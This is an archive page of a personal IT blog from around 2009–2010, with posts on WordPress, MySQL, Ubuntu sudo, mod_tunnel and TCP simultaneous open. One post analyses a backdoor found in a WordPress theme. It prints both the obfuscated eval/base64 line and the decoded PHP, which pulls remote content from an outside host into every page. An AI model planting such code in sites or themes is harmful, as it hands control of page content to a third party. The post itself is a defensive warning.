IT & Technology - Simone 'Wiz' Tellini

Monday, July 12. 2010

PCA Downloads

I'm happy to see that the new PC Authority downloads site went live

If you want a similar site, just ask

Posted by Simone in Software at 09:42 | Comments (0) | Trackbacks (0)

157 hits

Tuesday, May 25. 2010

This very useful dialog pops up when you aren't an administrator on Windows 2003, annoying you until you decide that it's time to reboot. Or find someone that can do it, that is.

I guess it deserves an UI Design Award

Posted by Simone in Fun, Software at 22:18 | Comments (0) | Trackbacks (0)

233 hits

Defined tags for this entry: fun, nonsense, software, ui, windows

Wednesday, February 10. 2010

Software reviews, hints and tips

A new software reviews site went live recently: Softwarecrew.

In my just-a-little-bit biased opinion, it's looking nice, but I should probably mention that I've worked on the WordPress theme it uses, plus I did write a couple of WP extensions to help the reviewers with their job.

Posted by Simone in Software at 22:48 | Comments (0) | Trackbacks (0)

580 hits

Defined tags for this entry: it & technology, software, wordpress

Friday, October 30. 2009

A cure for Firefox freezing on download.cnet.com

It's been a loooong time since I've been able to browse download.cnet.com without having Firefox freeze on article pages. Something's very nasty on that site (or Firefox/one of the plugins I use is very bugged). Some guy on mozillazine suggests to enable cookies from cnet.com, but I'd rather not: there must be another way

Anyway, AdBlock comes to rescue. Just add a filter blocking http://*.i.com.com/*.js and the problem vanishes.

Posted by Simone in Tips'n'Tricks at 18:02 | Comments (0) | Trackbacks (0)

947 hits

Wednesday, October 28. 2009

Old memories of an "ancient" Internet era...

This article is a must for people who was had a "web presence" 10 or more years ago: http://www.comedycentral.com/tosh.0/2009/10/26/goodbye-geocities/

Sometimes it's nice to look back at how things were and see all the progress that's been made since then. When I think at how my homepage looked in 1996 and compare it to the web applications I develop now for a living, with all the AJAX and scriptaculous fun, I can't help feeling old(ish).

Posted by Simone in IT & Technology at 12:41 | Comments (0) | Trackbacks (0)

757 hits

Defined tags for this entry: history, internet, it & technology

Wednesday, July 1. 2009

Quote of the Day

So The Pirate Bay has executed the Web 2.0 business plan to perfection: give someone else's stuff away for free - then find a bigger idiot to buy the company.

[...] in the case of Web 2.0, companies go from "pre-revenue" to "post-revenue" without any revenue in between. That's where you need a bigger idiot.

-- Andrew Orlowski, on The Register

Posted by Simone in IT & Technology, Quotes at 11:02 | Comments (0) | Trackbacks (0)

1325 hits

Defined tags for this entry: 2.0, it & technology, quotes, web

Tuesday, June 30. 2009

LogMiner 1.23

Version 1.23 of LogMiner, my Apache/IIS log analysis package, is now available.

This release mainly fixes some build problem on modern distributions.

Also it finally includes the cleanup function I was talking about some days ago...

Posted by Simone in Software, SysAdmin at 10:42 | Comments (0) | Trackbacks (0)

1336 hits

Defined tags for this entry: analysis, apache, iis, logminer, logs, software, sysadmin

Monday, June 15. 2009

Definition of the Day - Web 2.0

Q: Web 2.0 - are we speaking from hindsight when we try to define it?

A: We are speaking from no sight at all.

"Web 2.0" is a catch word coined by Tim O'Reilly who was trying to sell books for his publishing company. In my opinion, it was the saddest moment of O'Reillys careeer as for the most part, he brings clarity to technology not gummy eyewash and wool.

There is no spec, no standards committee, no list of particular technologies. It's just a vague slide made by O'Reilly that doesn't even include all the latest technologies and implies some are new that are not.
[...]

-- read on LinkedIn

Posted by Simone in IT & Technology at 16:33 | Comments (0) | Trackbacks (0)

1030 hits

Defined tags for this entry: 2.0, buzzword, it & technology, software, software development, web

Friday, June 12. 2009

I do hate MySQL

I can't stand it, really.

I'm using it at the moment only because I'm forced to. I can't help considering it as a toy DB, especially comparing it to PostgreSQL or SQL Server or any other serious RDBMS.

The last thing that hit my nerve is this bug. Come on... can't it even handle foreign keys in a decent way?

And I'm trying not to think that it allows you to define a table with foreign keys and silently ignore them.

</rant>

Posted by Simone in Software Development at 10:25 | Comment (1) | Trackbacks (0)

1144 hits

Defined tags for this entry: mysql, rant, software development

Monday, June 8. 2009

Snow Leopard upgrade at $29

Hey, I'm following the live coverage of WWDC and just read this nice detail... that is a good price for a little update, Microsoft should learn a lesson or two...

Posted by Simone in Software at 19:48 | Comments (0) | Trackbacks (0)

1112 hits

Defined tags for this entry: leopard, mac os x, snow, software, upgrade

Tuesday, May 26. 2009

Backdoor in WordPress themes?

I was looking for a theme to use in a WordPress blog and I stumbled on this one.

Cool, I thought, I might use it... but... hey... why there's this weird stuff in footer.php?

<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0
NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWEC
ePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc
5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRL
vlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/
b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5
p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBa
hOh0EIT7b8A'))); ?>

Uhm... it looks very suspicious. Too suspicious. Let's change eval with die and check what's all that stuff:

error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".
urlencode($_SERVER["HTTP_HOST"])."&uri=".
urlencode($_SERVER["REQUEST_URI"]);

if ((intval(get_cfg_var("allow_url_fopen")) ||
intval(ini_get("allow_url_fopen"))) &&
function_exists("file_get_contents")) {

echo @file_get_contents($CodeURL);

} elseif ((intval(get_cfg_var("allow_url_fopen")) ||
intval(ini_get("allow_url_fopen"))) && function_exists("file")) {

$content = @file($CodeURL);
echo @join("", $content);

} elseif (function_exists("curl_init")) {

$ch = curl_init($CodeURL);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}

Yep. It definitely looks like a backdoor.

It seems that you can never be too much careful...

(it seems like the first version I've download is different than the one on the site mentioned above, although there's still something evil in footer.php)

Posted by Simone in Software at 19:55 | Comments (0) | Trackbacks (0)

1476 hits

Defined tags for this entry: backdoor, php, security, software, wordpress

Saturday, May 2. 2009

FeedbackReporter and Mantis integration

I've just written a small script to store reports generated by FeedbackReporter on a Mantis system.

It should come handy to keep track of your application crashes (crash? uh? My apps never crash!

)

You can download it here.

Simply extract it on your webserver and edit config.php to adjust your settings.

It can work in two ways: if you're installing it on the same server running mantis, set MANTIS_LOCAL to true and MANTIS_PATH to the root of your mantis installation.

Otherwise, you can even install it on a different server and let it communicate with your mantis via SOAP. In order to do this, set MANTIS_LOCAL to false and edit MANTIS_URL. This setup needs the SOAP extension of PHP5, so make sure it's available.

Feedback is welcome, of course.

Posted by Simone in Software Development at 14:23 | Comments (0) | Trackbacks (0)

2334 hits

Defined tags for this entry: mac os x, mantis, software development

Wednesday, April 29. 2009

Perplexed about Ubuntu's sudoers configuration

Recently I've been administering my first Ubuntu machine and I already feel a bit perplexed about its security setup.

The issue is that by default, the root account password is locked in Ubuntu and you are encouraged never to use root, but rely on sudoers for system administration.

I've read the rationale on Ubuntu's wiki and I agree on some points, but their mindset is totally biased towards a desktop setup.

Let's consider these points from their site:

Benefits of using sudo: Users don't have to remember an extra password.
This is cool for Average Joe, but don't tell me that it's an advantage on a serious server: it's actually a downside, see the next point.

Every cracker trying to brute-force their way into your box will know it has an account named root and will try that first. What they don't know is what the usernames of your other users are. Since the root account password is locked, this attack becomes essentially meaningless, since there is no password to crack or guess in the first place.

Sure, the attack on root becomes useless, too bad that SSH brute-force attacks usually try lots of different usernames. If the manage to break a single account of a sudoer, they automatically have control of your machine. If you had to remember a different password to su your way, it would make their life a bit harder.

Allows easy transfer for admin rights, in a short term or long term period, by adding and removing users from groups, while not compromising the root account.

err... what does "not compromising the root account" actually mean? If I get admin rights, I can do whatever I want, including compromising any account. Unless I get authorisation just to run a limited set of commands through sudo, but that's not the point of this post.

The root account password does not need to be shared with everybody who needs to perform some type of administrative task(s) on the system.

ok, but what problem does it solve? (apart from avoiding people shouting the root password when they shouldn't )

If I want to remove a person from the admin group, I need to trust her not to have planted any malicious program (rootkits, backdoors...) or rebuild the system if I'm paranoid, if I really want to be on the safe and paranoid side.

IMHO, it's just the same as changing the root password when one is gone, or even better, periodically.

I'm not convinced. I still prefer the common su approach typical of almost all the other distributions...

Posted by Simone in SysAdmin at 13:47 | Comments (0) | Trackbacks (0)

1595 hits

Defined tags for this entry: security, ssh, su, sudo, sysadmin, ubuntu

Sunday, April 12. 2009

mod_tunnel for Apache 2.2.x

mod_tunnel is a simple Apache module that can be used to create TCP tunnels using your Web server. It is useful to expose services which can be reached through a proxy, bypassing firewalls.

After only 4 years since the previous version, you can now download version 2.0 which works with Apache 2.2.x (and maybe 2.0.x, but I haven't tested it).

You'll find it on sourceforge.

Posted by Simone in Software, SysAdmin at 17:52 | Comments (0) | Trackbacks (0)

4101 hits

Defined tags for this entry: apache, firewall, networking, proxy, software, sysadmin, tunnel

Tuesday, February 10. 2009

Connection without a listening socket?

I've encountered a network problem that left me a bit puzzled.

Usually, when you want to setup a TCP connection between two sockets (let's called them S1 and S2), you need to perform these steps on the server:

create S1

bind S1 to a port (or to a port/address, if you need to)

set S1 to listen for connections

on the client:

create S2

tell S2 to connect to S1

and finally, the server receives the connection attempt and accepts it to remove it from the backlog of the listening socket.

Well, apparently there's another way, which I suspect few know about.

Check out this simple application:

using System;
using System.Net;
using System.Net.Sockets;
using System.Threading;

namespace SocketTest
{
class Program
{
private static IPEndPoint a = new IPEndPoint( IPAddress.Loopback, 18000 );
private static IPEndPoint b = new IPEndPoint( IPAddress.Loopback, 18001 );

static void Main(string[] args)
{
Thread threadA = new Thread( ThreadA );
Thread threadB = new Thread( ThreadB );

threadB.Start();
threadA.Start();
}

static void ThreadA()
{
for(;;) {
try {
Socket sock = new Socket( a.AddressFamily, SocketType.Stream, ProtocolType.Tcp );

sock.Bind( b );
sock.Connect( a );

Console.WriteLine( "Connected from " + b + " to " + a );

Thread.Sleep( Timeout.Infinite );
}
catch {
}
}
}

static void ThreadB()
{
for(;;) {
try {
Socket sock = new Socket( b.AddressFamily, SocketType.Stream, ProtocolType.Tcp );

sock.Bind( a );
sock.Connect( b );

Console.WriteLine( "Connected from " + a + " to " + b );

Thread.Sleep( Timeout.Infinite );
}
catch {
}
}
}
}
}

Let's see what happens compiling and running it:

Yes, you get a connection between the two sockets. It's something I was never told about and I would have never expected to see. But it's correct as per RFC 793.

I've found out about it when a couple of clients on a test system started connecting between themselves, while they were supposed to connect to 2 different servers on localhost. Both clients were periodically trying to connect to their server, which was down. They were creating a new socket for every attempt, without binding it, thus Windows' TCP/IP stack assigned a sequential port number to them. Eventually, the two processes reached the configuration required for the "Simultaneous Connection Synchronization" as described in the RFC.

Interesting. I guess you live and you learn.

Posted by Simone in Software Development at 12:25 | Comments (0) | Trackbacks (0)

2006 hits